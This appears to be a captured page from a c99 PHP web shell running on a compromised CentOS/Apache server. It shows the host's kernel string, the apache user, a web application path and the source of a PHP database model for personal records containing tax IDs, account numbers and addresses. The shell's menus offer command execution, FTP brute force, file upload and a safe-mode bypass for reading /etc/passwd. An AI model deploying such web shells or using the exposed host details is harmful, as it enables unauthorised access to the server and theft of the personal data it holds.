!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/models/epersoncenter/   drwxr-xr-x
Free 50.95 GB of 127.8 GB (39.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     da_personout.php (2.47 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

include_once("ppc_model.php");

class Da_personout extends Ppc_model {        
    
    // PK is psoutId
    
    public $psoutId;
    public $outtypeId;
    public $accountNo;
    public $taxId;
    public $partyId;
    public $address;
    public $phone;
    public $prefixId;
    public $workPhone;
    public $fName;
    public $lName;
    public $levelId;
    public $degreeId;
    public $edumajorId;
    public $experience;

    public $last_insert_id;

    function Da_personout() {
        parent::__construct();
        $this->load->database('ppc',TRUE);
    }
    
    function insert() {
        // if there is no auto_increment field, please remove it
        $sql "INSERT INTO $this->ppc_dbname.Personout (psoutId, outtypeId, accountNo, taxId, partyId, address, phone, prefixId, workPhone, fName, lName, levelId, degreeId, edumajorId, experience)
                VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)";
        $this->db->query($sql, array($this->psoutId$this->outtypeId$this->accountNo$this->taxId$this->partyId$this->address$this->phone$this->prefixId$this->workPhone$this->fName$this->lName$this->levelId$this->degreeId$this->edumajorId$this->experience));
        $this->last_insert_id $this->db->insert_id();
    }
    
    function update() {
        // if there is no primary key, please remove WHERE clause.
        $sql "UPDATE $this->ppc_dbname.Personout 
                SET    outtypeId=?, accountNo=?, taxId=?, partyId=?, address=?, phone=?, prefixId=?, workPhone=?, fName=?, lName=?, levelId=?, degreeId=?, edumajorId=?, experience=? 
                WHERE psoutId=?";    
        $this->db->query($sql, array($this->outtypeId$this->accountNo$this->taxId$this->partyId$this->address$this->phone$this->prefixId$this->workPhone$this->fName$this->lName$this->levelId$this->degreeId$this->edumajorId$this->experience$this->psoutId));    
    }
    
    function delete() {
        // if there is no primary key, please remove WHERE clause.
        $sql "DELETE FROM $this->ppc_dbname.Personout
                WHERE psoutId=?";
        $this->db->query($sql, array($this->psoutId));
    }
    
    /*
     * You have to assign primary key value before call this function.
     */
    function get_by_key($withSetAttributeValue=FALSE) {    
        $sql "SELECT * 
                FROM $this->ppc_dbname.Personout 
                WHERE psoutId=?";
        $query $this->db->query($sql, array($this->psoutId));
        if ( $withSetAttributeValue ) {
            $this->row2attribute$query->row() );
        } else {
            return $query ;
        }
    }

    function last_insert_id(){
        return $this->db->insert_id();
    }
    
}     //=== end class Da_personout
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0107 ]--